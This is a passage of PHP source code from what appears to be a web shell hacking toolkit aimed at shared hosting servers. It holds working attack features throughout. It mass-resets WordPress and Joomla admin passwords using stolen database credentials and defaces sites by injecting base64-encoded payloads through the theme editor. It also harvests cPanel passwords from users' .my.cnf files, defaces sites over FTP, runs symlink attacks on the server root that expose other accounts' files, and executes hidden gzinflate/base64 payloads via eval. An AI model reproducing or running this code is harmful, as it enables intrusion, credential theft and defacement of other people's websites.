1358false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font
1359color=\"green\">success..</font><br>";
1360 } else {
1361 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1362false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font color=\"red\">mysql
1363fail</font></td>";
1364 }
1365
1366 }
1367
1368 elseif(chk_header($pageURL."ciprut/".$etcc[0]."-Joomla.txt")){
1369 $cnf=file_get_contents($pageURL."ciprut/".$etcc[0]."-Joomla.txt");
1370 $config=$pageURL."ciprut/".$owner["name"]."-Joomla.txt";
1371
1372 if(preg_match("%(JConfig|mosConfig)%",$cnf)){
1373
1374 if(preg_match("%JConfig%",$cnf)){
1375 $username=Find($cnf,"\$user = '","'");
1376 $password=Find($cnf,"\$password = '","'");
1377 $dbname=Find($cnf,"\$db = '","'");
1378 $prefix=Find($cnf,"\$dbprefix = '","'");
1379 $site_url=Find($cnf,"\$mailfrom = '","'");
1380 $site_url=explode("@",$site_url);
1381 $link=mysql_connect("localhost",$username,$password);
1382
1383 if($link){
1384 $hash=md5($pass);
1385 mysql_select_db($dbname,$link);
1386 $tab=$prefix."users";
1387 $query2=@mysql_query("UPDATE `$tab` SET `username` ='$user'");
1388 $query3=@mysql_query("UPDATE `$tab` SET `password` ='$hash'");
1389 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1390false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font
1391color=\"green\">success..</font><br>";
1392 } else {
1393 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1394false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font color=\"red\">mysql
1395fail</font></td>";
1396 }
1397
1398 }
1399
1400 elseif(preg_match("%mosConfig%",$cnf)){
1401 $username=Find($cnf,"\$mosConfig_user = '","'");
1402 $password=Find($cnf,"\$mosConfig_password = '","'");
1403 $dbname=Find($cnf,"\$mosConfig_db = '","'");
1404 $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
1405 $site_url=Find($cnf,"\$mailfrom = '","'");
1406 $site_url=explode("@",$site_url);
1407 $link=mysql_connect("localhost",$username,$password);
1408
1409 if($link){
1410 $hash=md5($pass);
1411 mysql_select_db($dbname,$link);
1412 $tab=$prefix."users";
1413 $query2=@mysql_query("UPDATE `$tab` SET `username` ='$user'");
1414 $query3=@mysql_query("UPDATE `$tab` SET `password` ='$hash'");
1415 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1416false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font
1417color=\"green\">success..</font><br>";
1418 } else {
1419 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1420false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">Joomla</a></td><td><font color=\"red\">mysql
1421fail</font></td>";
1422 }
1423
1424 }
1425
1426 }
1427
1428 }
1429
1430 }
1431
1432 }
1433
1434 }
1435
1436 break;
1437 case"wp_def":
1438 $user="admin";
1439 $pass="foo";
1440 echo"<div align=\"center\">
1441<form action=\"\" method=\"POST\">
1442<label>Deface URL: </label> <input type=\"text\" style=\"width:450px;\" name=\"deface_page\"><br />
1443<input type=\"submit\" value=\"DEFACE\">
1444</form>
1445";
1446
1447 if($_POST){
1448 $deface=file_get_contents(trim($_POST["deface_page"]));
1449
1450 if(is_readable("/var/named")){
1451 echo"<table align=\"center\" border=\"1\" width=\"45%\" cellspacing=\"0\" cellpadding=\"4\">";
1452 echo"<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td><td>DEF URL</td>";
1453 $list=scandir("/var/named");
1454 foreach($list as$domain){
1455
1456 if(strpos($domain,".db")){
1457 $domain=str_replace(".db","",$domain);
1458 $owner=posix_getpwuid(fileowner("/etc/valiases/".$domain));
1459 $url="http://".$domain;
1460
1461 if(chk_header($pageURL."ciprut/".$owner["name"]."-WordPress.txt")){
1462 $config=$pageURL."ciprut/".$owner["name"]."-WordPress.txt";
1463 file_get_contents($pageURL."ciprut/".$owner["name"]."-WordPress.txt");
1464 $cnf=file_get_contents($pageURL."ciprut/".$owner["name"]."-WordPress.txt");
1465 $hostname=Find($cnf,"define('DB_HOST', '","');");
1466 $username=Find($cnf,"define('DB_USER', '","');");
1467 $password=Find($cnf,"define('DB_PASSWORD', '","');");
1468 $dbname=Find($cnf,"define('DB_NAME', '","');");
1469 $prefix=Find($cnf,"table_prefix = '","'");
1470 $link=mysql_connect($hostname,$username,$password);
1471
1472 if($link){
1473 $hash=crypt($pass);
1474 mysql_select_db($dbname,$link);
1475 $tab=$prefix."users";
1476 $query2=@mysql_query("UPDATE `$tab` SET `user_login` ='$user'");
1477 $query3=@mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'");
1478 $req=@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1479 $data=mysql_fetch_array($req);
1480 $site_url=$data["option_value"];
1481 error_reporting(0);
1482 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1483false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font color=\"green\">[#]
1484User Pass Changed </font><br>";
1485 $post="log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1";
1486 $def="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($deface))))."')));
1487exit; ?>";
1488 $buffer0=CurlPage($site_url."/wp-login.php",$post);
1489
1490 if(!preg_match("/logout/i",$buffer0)){
1491 echo"<font color='red'>[X] FAILED TO LOGIN</font><br />";
1492 } else {
1493 echo"<font color='green'>[#] LOGGED IN :D</font><br>";
1494 $urlz=$site_url."/wp-admin/theme-editor.php";
1495 $themeditor=CurlPage($urlz,$cookie,null);
1496
1497 if(preg_match("/update file/i",$themeditor)){
1498 echo"theme-editor opened<br /></td>";
1499 } else {
1500 echo"error
1501opening theme edtitor!</td>";
1502 }
1503
1504 $nola=explode(Chr(10),$themeditor);
1505 foreach($nola as$nline){
1506
1507 if(preg_match("%theme-editor\.php\\?file=%",$nline)&&preg_match("%\\((404\\.php|archive\\.php|comment\.php)\)%",strtolower($nline))){
1508 $modify[Find($nline,"(",")")]=Find($nline,"<a href=\"","\"");
1509 }
1510
1511 }
1512
1513 echo"<td>";
1514
1515 if(is_array($modify)){
1516 foreach($modify as$met=>$indfile){
1517 $nri=str_replace(".","_",$met);
1518 $nri="n".$nri;
1519 $indfile=str_replace("&","&",$indfile);
1520 $url=trim($site_url."/wp-admin/".$indfile);
1521 $themepage=CurlPage($url,"");
1522 $_wpnonce=Find($themepage,"name=\"_wpnonce\" value=\"","\"");
1523 $_file=Find($themepage,"name=\"file\" value=\"","\"");
1524 $nfile=explode("themes",$_file);
1525 $jfile=$site_url."/wp-content/themes".end($nfile);
1526 $url=$site_url."/wp-admin/theme-editor.php";
1527 $postme="newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
1528 $themedied=CurlPage($url,$postme);
1529
1530 if(preg_match("%<div id=\"message\" class=\"updated\">%",$themedied)){
1531 $theme=Find($themeditor,"<li><a href=\"theme-editor.php?file=404.php&theme=","\">404 Template");
1532
1533 if(preg_match("/twenty ten/i",$theme)){
1534 $theme="twentyten";
1535 }
1536
1537 elseif(preg_match("/twenty eleven/i",$theme)){
1538 $theme="twentyeleven";
1539 }
1540
1541 $theme=trim(str_replace("/","",$theme));
1542 $d=$site_url."/wp-content/themes/".$theme."/404.php";
1543 listall("wp.txt",$d.Chr(10));
1544 }
1545
1546 }
1547
1548 echo"<a href=".$d.">LINK</a><br />";
1549 echo"</td>";
1550 }
1551
1552 }
1553
1554 } else {
1555 echo"<tr><td><a href=".$url." onclick=\"window.open(this.href);return
1556false;\">".$domain."</a></td><td>".$owner["name"]."</td><td><a href=".$config.">WordPress</a></td><td><font color=\"red\">[x]
1557mysql fail</font></td>";
1558 }
1559
1560 }
1561
1562 }
1563
1564 }
1565
1566 }
1567
1568 }
1569
1570 break;
1571 case"uploader":
1572 echo"<center><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
1573 echo"<center><input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\"
1574value=\"Upload\"></form></center>";
1575
1576 if($_POST["_upl"]=="Upload"){
1577
1578 if(@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"])){
1579 echo"<p align=\"center\"><font face=\"Verdana\"
1580size=\"1\"><font color=\"white\"> Done !!</font><br>";
1581 } else {
1582 echo"<font color=\"#FF0000\">Failed :( </font></p>
1583 </td></table></tr>
1584";
1585 }
1586
1587 }
1588
1589 }
1590
1591 }
1592}
1593elseif(isset($_GET['x']) && ($_GET['x'] == 'private')){
1594?>
1595<form action="?y=<?php echo $pwd; ?>&x=private" method="post">
1596<b><center>love you Salsha :* i have (mpc)</b>
1597</form>
1598
1599<?php }
1600
1601
1602elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
1603 @ob_start();
1604 @eval("phpinfo();");
1605 $buff = @ob_get_contents();
1606 @ob_end_clean();
1607 $awal = strpos($buff,"<body>")+6;
1608 $akhir = strpos($buff,"</body>");
1609 echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
1610}
1611elseif(isset($_GET['view']) && ($_GET['view'] != "")){
1612 if(is_file($_GET['view'])){
1613 if(!isset($file)) $file = magicboom($_GET['view']);
1614 if(!$win && $posix){
1615 $name=@posix_getpwuid(@fileowner($folder));
1616 $group=@posix_getgrgid(@filegroup($folder));
1617 $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
1618 }
1619 else {
1620 $owner = $user;
1621 }
1622 $filn = basename($file);
1623 echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
1624 <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
1625 <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1626 <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1627 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1628 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
1629 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
1630 </form>
1631 </td></tr>
1632 <tr><td>Size</td><td>".ukuran($file)."</td></tr>
1633 <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
1634 <tr><td>Owner</td><td>".$owner."</td></tr>
1635 <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
1636 <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
1637 <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
1638 <tr><td>Actions</td><td><a href=\"?y=$pwd&edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$file\">delete</a> | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gzip</a>)</td></tr>
1639 <tr><td>View</td><td><a href=\"?y=".$pwd."&view=".$file."\">text</a> | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a> | <a href=\"?y=".$pwd."&view=".$file."&type=image\">image</a></td></tr>
1640 </table>
1641 ";
1642 if(isset($_GET['type']) && ($_GET['type']=='image')){
1643 echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>";
1644 }
1645 elseif(isset($_GET['type']) && ($_GET['type']=='code')){
1646 echo "<div class=\"viewfile\">";
1647 $file = wordwrap(@file_get_contents($file),"240","\n");
1648 @highlight_string($file);
1649 echo "</div>";
1650 }
1651 else {
1652 echo "<div class=\"viewfile\">";
1653 echo nl2br(htmlentities((@file_get_contents($file))));
1654 echo "</div>";
1655 }
1656 }
1657 elseif(is_dir($_GET['view'])){
1658 echo showdir($pwd,$prompt);
1659 }
1660
1661}
1662//////////////////////////////////////////////////
1663elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){
1664
1665 if(isset($_POST['save'])){
1666 $file = $_POST['saveas'];
1667 $content = magicboom($_POST['content']);
1668 if($filez = @fopen($file,"w")){
1669 $time = date("d-M-Y H:i",time());
1670 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
1671 else $msg = "failed to save";
1672 @fclose($filez);
1673 }
1674 else $msg = "permission denied";
1675 }
1676 if(!isset($file)) $file = $_GET['edit'];
1677 if($filez = @fopen($file,"r")){
1678 $content = "";
1679 while(!feof($filez)){
1680 $content .= htmlentities(str_replace("''","'",fgets($filez)));
1681 }
1682 @fclose($filez);
1683 }
1684
1685?>
1686<form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
1687<table class="cmdbox">
1688<tr><td colspan="2">
1689<textarea class="output" name="content">
1690<?php echo $content; ?>
1691</textarea>
1692<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
1693 <?php echo $msg; ?></td></tr>
1694</table>
1695</form>
1696<?php
1697}
1698elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
1699{
1700?>
1701<form action="?y=<?php echo $pwd; ?>&x=logout" method="post">
1702
1703<?php
1704 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1705 echo '<center><b>logged out</b></center>';
1706}
1707elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel'))
1708 {
1709 ?>
1710
1711 <a href="?<?php echo "path=".$path; ?>&x=brute><input class=inputzbut type=submit value="cpanel bruteforce" /></a>
1712 <a href="?<?php echo "path=".$path; ?>&x=cpcrack"><input class=inputzbut type=submit value="cpanel finder/cracker" /></a><br>
1713 <a href="?<?php echo "path=".$path; ?>&x=cpdef"><input class=inputzbut type=submit value="cpanel deface" /></a>
1714 <a href="?<?php echo "path=".$path; ?>&x=brute"><input class=inputzbut type=submit value="cpanel brute force" /></a>
1715 <?php
1716 }
1717elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack'))
1718 {
1719 ?>
1720 <form action="?y=<?php echo $pwd; ?>&x=brute" method="post">
1721 <?php
1722
1723@ini_set('display_errors',0);
1724function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1725 $ar0=explode($marqueurDebutLien, $text);
1726 $ar1=explode($marqueurFinLien, $ar0[$i]);
1727 return trim($ar1[0]);
1728}
1729
1730echo '<h1>Cpanel Finder/Cracker</h1><br/>';
1731
1732echo "<center>";
1733$d0mains = @file('/etc/named.conf');
1734$domains = scandir("/var/named");
1735
1736if ($domains or $d0mains)
1737{
1738 $domains = scandir("/var/named");
1739 if($domains) {
1740echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1741$count=1;
1742$dc = 0;
1743$list = scandir("/var/named");
1744foreach($list as $domain){
1745if(strpos($domain,".db")){
1746$domain = str_replace('.db','',$domain);
1747$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1748$dirz = '/home/'.$owner['name'].'/.my.cnf';
1749$path = getcwd();
1750
1751if (is_readable($dirz)) {
1752copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1753$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
1754$password=entre2v2($p,'password="','"');
1755echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1756$dc++;
1757}
1758
1759}
1760}
1761echo '</table>';
1762$total = $dc;
1763echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
1764echo '</center>';
1765}else{
1766$d0mains = @file('/etc/named.conf');
1767 if($d0mains) {
1768echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1769$count=1;
1770$dc = 0;
1771$mck = array();
1772foreach($d0mains as $d0main){
1773 if(@eregi('zone',$d0main)){
1774 preg_match_all('#zone "(.*)"#',$d0main,$domain);
1775 flush();
1776 if(strlen(trim($domain[1][0])) >2){
1777 $mck[] = $domain[1][0];
1778 }
1779 }
1780}
1781$mck = array_unique($mck);
1782$usr = array();
1783$dmn = array();
1784foreach($mck as $o) {
1785 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1786 $usr[] = $infos['name'];
1787 $dmn[] = $o;
1788}
1789array_multisort($usr,$dmn);
1790$dt = file('/etc/passwd');
1791$passwd = array();
1792foreach($dt as $d) {
1793 $r = explode(':',$d);
1794 if(strpos($r[5],'home')) {
1795 $passwd[$r[0]] = $r[5];
1796 }
1797}
1798$l=0;
1799$j=1;
1800foreach($usr as $r) {
1801$dirz = '/home/'.$r.'/.my.cnf';
1802$path = getcwd();
1803if (is_readable($dirz)) {
1804copy($dirz, ''.$path.'/'.$r.'.txt');
1805$p=file_get_contents(''.$path.'/'.$r.'.txt');
1806$password=entre2v2($p,'password="','"');
1807echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1808$dc++;
1809 flush();
1810 $l=$l?0:1;
1811 $j++;
1812 }
1813 }
1814 }
1815echo '</table>';
1816$total = $dc;
1817echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />';
1818echo '</center>';
1819
1820}
1821}else{
1822echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>";
1823}
1824
1825echo "</body></html>";
1826?>
1827<?php }
1828elseif(isset($_GET['x']) && ($_GET['x'] == 'cpdef'))
1829 {
1830 ?>
1831 <form action="?path=<?php echo $path; ?>&x=cpdef" method="post">
1832<?php
1833$head = '<html>
1834<head>
1835<title>Auto Cpanel Defacer</title>
1836<script language=\'javascript\'>
1837function hide_div(id)
1838{
1839 document.getElementById(id).style.display = \'none\';
1840 document.cookie=id+\'=0;\';
1841}
1842function show_div(id)
1843{
1844 document.getElementById(id).style.display = \'block\';
1845 document.cookie=id+\'=1;\';
1846}
1847function change_divst(id)
1848{
1849 if (document.getElementById(id).style.display == \'none\')
1850 show_div(id);
1851 else
1852 hide_div(id);
1853}
1854</script>'; ?>
1855<html>
1856 <head>
1857 <?php
1858 echo $head ;
1859 echo '
1860
1861<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
1862 <td width="100%" align=center valign="top" rowspan="1">
1863 <div class="hedr">
1864 <td height="10" align="left" class="td1"></td></tr><tr><td width="100%" align="center" valign="top" rowspan="1"><font color="red" face="comic sans ms"size="1"><b>
1865 <br><font face="Andalus" size="4" color=#58FAF4>Cpanel Auto Defacer</font><br>
1866 <br><br>
1867 <font color="RED" face="gothic" size="3"></font><br>
1868 </table>
1869';
1870?>
1871
1872
1873<body bgcolor=black><h6 style="text-align:center"><font color=white>
1874<p><form method=post>
1875 server ip: <input class=inputzbut type=text name=hi value=ip>
1876 username: <input class=inputzbut type=text name=tx value=>  
1877 password:<input class=inputzbut type=text name=p value=><p>
1878 file that you want to deface: <input class=inputzbut type=text name=ph value="index.php">
1879 <p><font color=red size=3>Deface page link : </font>
1880 <textarea rows=1 cols=50 class=inputzbut name=deface value="your daface page link">
1881 </textarea>
1882 <p><input class=inputzbut type=submit name=sm value="Submit" /><br>
1883 </form>
1884<?php
1885
1886if(isset($_POST['sm']))
1887{
1888 $ip=trim($_POST['hi']);
1889 $u=trim($_POST['tx']);
1890 $p=trim($_POST['p']);
1891 $d=trim($_POST['ph']);
1892 $df=trim($_POST['deface']);
1893 echo "<br><font color=white size=2>";
1894 echo "<font color=red size=3>server ip :</font> ".$ip;
1895 echo "<br><font color=red size=3>user :</font>  ".$u;
1896 echo "<br><font color=red size=3>password :</font>  ".$p;
1897 echo "<br><font color=red size=3>dirctory :</font>  ".$d;
1898 echo "<br><font color=red size=3>deface link :</font><br>".$df."<br>";
1899 $dl="public_html/".$d;
1900 $si= ftp_connect($ip);
1901
1902$try= ftp_login($si,$u,$p);
1903if ((!$si) || (!$try))
1904{
1905 echo "<br>could not connected :(";
1906 exit;
1907}
1908else
1909{
1910 echo "<br>connection done<br><br>";
1911}
1912$deface = ftp_put($si, $dl , $df, FTP_BINARY);
1913if ($deface)
1914{
1915 echo "hell yesh page got defaced successfully";
1916}
1917else
1918{
1919 echo "try manually :(";
1920}
1921 }
1922?>
1923 </strong>
1924 </td>
1925 </tr>
1926 <tr>
1927 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
1928 <td valign="top" bgcolor="#151515" colspan="5">
1929 <strong>
1930<form method="POST" target="_blank">
1931 <strong>
1932<input name="matikan" type="hidden" value="sekatan">
1933 </strong>
1934
1935<?php
1936if(''==($func=@ini_get('disable_functions')))
1937{
1938echo "<font color=white>No Security for Function</font></b>";
1939}else{
1940echo '<script>alert("Please see below and press >Please Click Here First!<");</script>';
1941echo "<font color=red>$func</font></b>";
1942echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>';
1943echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
1944 </strong>
1945 </td></tr>';
1946}
1947?></strong></td></tr></table></table></table>
1948<?php
1949}
1950///////////////////////////////////////////////////////////////////////////
1951elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ @eval(gzinflate(base64_decode($jumper))); "</div>"; }
1952elseif(isset($_GET['x']) && ($_GET['x'] == 'zonekerupuk')){ @eval(gzinflate(base64_decode($zonekerupuk))); "</div>"; }
1953#################################################################
1954########################################
1955########################
1956#####################
1957# START HERE
1958//ini sym file
1959////////////////////////////////////////////////////////////////////////////////////////////////////////////
1960elseif(isset($_GET['x']) && ($_GET['x'] == 'sf')) {@set_time_limit(0);@mkdir('sym',0777);error_reporting(0);
1961$htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1962$op =@fopen ('sym/.htaccess','w');
1963fwrite($op ,$htaccess);
1964echo '<br><br><center><h2>Symlink File !</h2></center><center><br>
1965<div class="mybox"><h2 class="k2ll33d2">Symlink</h2><br>
1966<form method="post"> File Path:<br>
1967<input class="inputz" type="text" name="file" value="/home/user/public_html/config.php" size="60"/>
1968<br>Symlink Name<br><input class="inputz" type="text" name="symfile" value="s.txt" size="60"/><br><br>
1969<input class="inputzbut" type="submit" value="symlink" name="symlink" /><br><br></form></div></center>';
1970$target = $_POST['file'];
1971$symfile = $_POST['symfile'];
1972$symlink = $_POST['symlink'];
1973if ($symlink) {@symlink("$target","sym/$symfile");
1974echo '<br><center><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a><br><br><br><br></center>';}}
1975/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1976//sym sec
1977elseif(isset($_GET['x']) && ($_GET['x'] == 'sec')){
1978$d0mains = @file("/etc/named.conf");
1979##httaces
1980if($d0mains){
1981@mkdir("k2",0777);
1982@chdir("k2");
1983@exe("ln -s / root");
1984$file3 = 'Options all
1985DirectoryIndex Sux.html
1986AddType text/plain .php
1987AddHandler server-parsed .php
1988AddType text/plain .html
1989AddHandler txt .html
1990Require None
1991Satisfy Any';
1992$fp3 = fopen('.htaccess','w');
1993$fw3 = fwrite($fp3,$file3);@fclose($fp3);
1994echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
1995<table align=center border=1 style='width:60%;border-color:#333333;'>
1996<tr>
1997<td align=center><font size=3>S. No.</font></td>
1998<td align=center><font size=3>Domains</font></td>
1999<td align=center><font size=3>Users</font></td>
2000<td align=center><font size=3>Symlink</font></td>
2001</tr>";
2002$dcount = 1;
2003foreach($d0mains as $d0main){
2004if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
2005flush();
2006if(strlen(trim($domains[1][0])) > 2){
2007$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2008echo "<tr align=center><td><font size=3>" . $dcount . "</font></td>
2009<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
2010<td>".$user['name']."</td>
2011<td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2012flush();
2013$dcount++;}}}
2014echo "</table>";
2015}else{
2016$TEST=@file('/etc/passwd');
2017if ($TEST){
2018@mkdir("k2",0777);
2019@chdir("k2");
2020exe("ln -s / root");
2021$file3 = 'Options all
2022 DirectoryIndex Sux.html
2023 AddType text/plain .php
2024 AddHandler server-parsed .php
2025 AddType text/plain .html
2026 AddHandler txt .html
2027 Require None
2028 Satisfy Any';
2029 $fp3 = fopen('.htaccess','w');
2030 $fw3 = fwrite($fp3,$file3);
2031 @fclose($fp3);
2032 echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
2033 <table align=center border=1><tr>
2034 <td align=center><font size=4>S. No.</font></td>
2035 <td align=center><font size=4>Users</font></td>
2036 <td align=center><font size=4>Symlink</font></td></tr>";
2037 $dcount = 1;
2038 $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2039 while(!feof($file)){
2040 $s = fgets($file);
2041 $matches = array();
2042 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2043 $matches = str_replace("home/","",$matches[1]);
2044 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2045 continue;
2046 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2047 <td align=center><font class=txt>" . $matches . "</td>";
2048 echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2049 $dcount++;}fclose($file);
2050 echo "</table>";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all
2051 DirectoryIndex Sux.html
2052 AddType text/plain .php
2053 AddHandler server-parsed .php
2054 AddType text/plain .html
2055 AddHandler txt .html
2056 Require None
2057 Satisfy Any';
2058 $fp3 = fopen('.htaccess','w');
2059 $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2060 echo "<br><br><center><h2>Symlink Server !</h2></center><br><br><center>
2061 <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
2062 <table align=center border=1><tr>
2063 <td align=center><font size=4>id</font></td>
2064 <td align=center><font size=4>Users</font></td>
2065 <td align=center><font size=4>Symlink</font></td></tr>";
2066 $temp = "";$val1 = 0;$val2 = 1000;
2067 for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2068 if ($uid)$temp .= join(':',$uid)."\n";}
2069 echo '<br/>';$temp = trim($temp);$file5 =
2070 fopen("test.txt","w");
2071 fputs($file5,$temp);
2072 fclose($file5);$dcount = 1;$file =
2073 fopen("test.txt", "r") or exit("Unable to open file!");
2074 while(!feof($file)){$s = fgets($file);$matches = array();
2075 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2076 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2077 continue;
2078 echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2079 <td align=center><font class=txt>" . $matches . "</td>";
2080 echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2081 $dcount++;}
2082 fclose($file);
2083 echo "</table></div></center>";unlink("test.txt");
2084 } else
2085 echo "<center><font size=4>Cannot create Symlink</font></center>";
2086 }
2087 }
2088 }
2089/////////////////////////////////////////////////////////////////
2090## db dump
2091elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
2092 {
2093 ?>
2094 <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">
2095 <?php
2096echo $head.'<p align="center">';
2097echo '
2098<table width=371 class=tabnet >
2099<tr><th colspan="2">Database Dump</th></tr>
2100<tr>
2101 <td>Server </td>
2102 <td><input class="inputz" type=text name=server size=52></td></tr><tr>
2103 <td>Username</td>
2104 <td><input class="inputz" type=text name=username size=52></td></tr><tr>
2105 <td>Password</td>
2106 <td><input class="inputz" type=text name=password size=52></td></tr><tr>
2107 <td>DataBase Name</td>
2108 <td><input class="inputz" type=text name=dbname size=52></td></tr>
2109 <tr>
2110 <td>DB Type </td>
2111 <td><form method=post action="'.$me.'">
2112 <select class="inputz" name=method>
2113 <option value="gzip">Gzip</option>
2114 <option value="sql">Sql</option>
2115 </select>
